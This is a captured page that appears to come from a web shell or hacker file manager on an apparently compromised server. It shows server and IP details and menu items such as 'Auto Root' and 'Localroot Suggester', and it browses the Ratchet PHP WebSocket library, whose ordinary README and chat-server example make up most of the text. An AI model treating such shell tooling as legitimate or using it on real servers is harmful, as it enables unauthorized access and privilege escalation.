Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.116.170.100
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp_probe /
vendor /
cboden /
ratchet /
Delete
Unzip
Name
Size
Permission
Date
Action
src
[ DIR ]
drwxr-xr-x
2020-07-07 15:50
tests
[ DIR ]
drwxr-xr-x
2020-07-07 15:50
.gitignore
52
B
-rw-r--r--
2020-07-07 15:50
.travis.yml
302
B
-rw-r--r--
2020-07-07 15:50
CHANGELOG.md
5.42
KB
-rw-r--r--
2020-07-07 15:50
LICENSE
1.04
KB
-rw-r--r--
2020-07-07 15:50
Makefile
1.37
KB
-rw-r--r--
2020-07-07 15:50
README.md
2.84
KB
-rw-r--r--
2020-07-07 15:50
composer.json
1.03
KB
-rw-r--r--
2020-07-07 15:50
phpunit.xml.dist
703
B
-rw-r--r--
2020-07-07 15:50
Save
Rename
# Ratchet [](http://travis-ci.org/ratchetphp/Ratchet) [](http://socketo.me/reports/ab/index.html) [](https://packagist.org/packages/cboden/ratchet) A PHP library for asynchronously serving WebSockets. Build up your application through simple interfaces and re-use your application without changing any of its code just by combining different components. ## Requirements Shell access is required and root access is recommended. To avoid proxy/firewall blockage it's recommended WebSockets are requested on port 80 or 443 (SSL), which requires root access. In order to do this, along with your sync web stack, you can either use a reverse proxy or two separate machines. You can find more details in the [server conf docs](http://socketo.me/docs/deploy#server_configuration). ### Documentation User and API documentation is available on Ratchet's website: http://socketo.me See https://github.com/cboden/Ratchet-examples for some out-of-the-box working demos using Ratchet. Need help? Have a question? Want to provide feedback? Write a message on the [Google Groups Mailing List](https://groups.google.com/forum/#!forum/ratchet-php). --- ### A quick example ```php <?php use Ratchet\MessageComponentInterface; use Ratchet\ConnectionInterface; // Make sure composer dependencies have been installed require __DIR__ . '/vendor/autoload.php'; /** * chat.php * Send any incoming messages to all connected clients (except sender) */ class MyChat implements MessageComponentInterface { protected $clients; public function __construct() { $this->clients = new \SplObjectStorage; } public function onOpen(ConnectionInterface $conn) { $this->clients->attach($conn); } public function onMessage(ConnectionInterface $from, $msg) { foreach ($this->clients as $client) { if ($from != $client) { $client->send($msg); } } } public function onClose(ConnectionInterface $conn) { $this->clients->detach($conn); } public function onError(ConnectionInterface $conn, \Exception $e) { $conn->close(); } } // Run the server application through the WebSocket protocol on port 8080 $app = new Ratchet\App('localhost', 8080); $app->route('/chat', new MyChat, array('*')); $app->route('/echo', new Ratchet\Server\EchoServer, array('*')); $app->run(); ``` $ php chat.php ```javascript // Then some JavaScript in the browser: var conn = new WebSocket('ws://localhost:8080/echo'); conn.onmessage = function(e) { console.log(e.data); }; conn.onopen = function(e) { conn.send('Hello Me!'); }; ```